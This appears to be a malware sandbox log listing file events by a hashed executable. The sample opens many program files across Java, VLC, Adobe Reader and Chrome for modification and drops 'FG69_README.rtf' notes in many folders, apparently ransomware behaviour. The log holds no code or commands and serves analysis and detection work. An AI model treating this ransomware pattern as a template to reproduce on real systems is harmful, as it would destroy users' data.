d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\To_Do_List.jtp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\default.jfc d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansDemiBold.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+7 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fakaofo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-windows.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\OptimizeJoin.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Jujuy d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbytools.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Swift_Current d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Sofia d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\meta-index d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Regina d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Toronto d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\xjc.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chihuahua d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\Welcome.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_pt_BR.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Windows Mail\WinMail.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hebron d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pitcairn d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Music.jtp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\84.0.4147.89.manifest d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-10 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Caracas d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmic.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Campo_Grande d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\classfile_constants.h d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+12 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\ext\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\psfont.properties.ja d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rankin_Inlet d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.jasper.glassfish_2.2.2.v201205150955.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Paris d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Mail\wabmig.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\CIEXYZ.pf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Syowa d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-progress.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Almaty d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Singapore d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Vladivostok d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\notification_helper.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zaporozhye d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Miquelon d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jerusalem d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santo_Domingo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Colombo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Whitehorse d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\nl.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ja.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novosibirsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\New_Salem d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hovd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\calendars.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tallinn d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\ZoneInfoMappings d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Sofia d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Buenos_Aires d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thunder_Bay 